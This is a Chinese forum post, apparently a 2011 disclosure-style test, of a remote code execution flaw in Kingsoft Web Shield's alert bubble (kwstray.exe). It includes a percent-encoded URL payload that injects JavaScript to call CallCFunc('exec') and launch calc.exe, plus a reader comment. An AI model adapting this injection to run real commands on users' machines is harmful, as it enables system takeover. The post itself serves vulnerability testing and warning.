×

微信扫一扫,快捷登录!

金山网盾远程代码执行漏洞测试

标签: 暂无标签
今天看到一篇关于金山网盾漏洞的文章,验证了下,确实很严重,黑客可以利用这个漏洞以管理员权限执行任何系统代码和命令。
出问题的组件出现在金山网盾的气泡提示(kwstray.exe)中。众所周知,当金山网盾检测到恶意网址时右下角会弹出pop窗口,告知用户恶意网址的地址。但由于其网址过滤处理存在问题,允许黑客在本地执行Javascript,进而远程执行任何程序。
知道了漏洞的原理,测试就比较简单了。我们需要找一个金山网盾能够识别和拦截的恶意网页,触发网盾弹出提示气泡。然后构造一个恶意的URL(或文件路径)来执行指令。
找了一个06014的利用代码网页test.htm(网盾可拦),放在c:\test目录。在浏览器中输入:
file://c:/test/test.htm?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e
网盾会报警,随后IE浏览器崩溃,计算器程序被成功运行。经过测试输入网址和输入本地路径效果一样,我懒得架IIS了,有兴趣可以自己测试下。




上一篇:Netgear Firewall FVX538有何优缺点?
下一篇:当前有哪些主流硬件防火墙?
舍我其谁

写了 263 篇文章,拥有财富 1402,被 3 人关注

您需要登录后才可以回帖 登录 | 立即注册
B Color Link Quote Code Smilies
一同进步 发表于 2011-8-15 17:44:00
幸好我没有用这个,看来还是很严重的,在用的朋友们还是暂时别用了吧,这个漏洞还是很危险的,被黑客侵入就晚了
Powered by IT 运维管理
返回顶部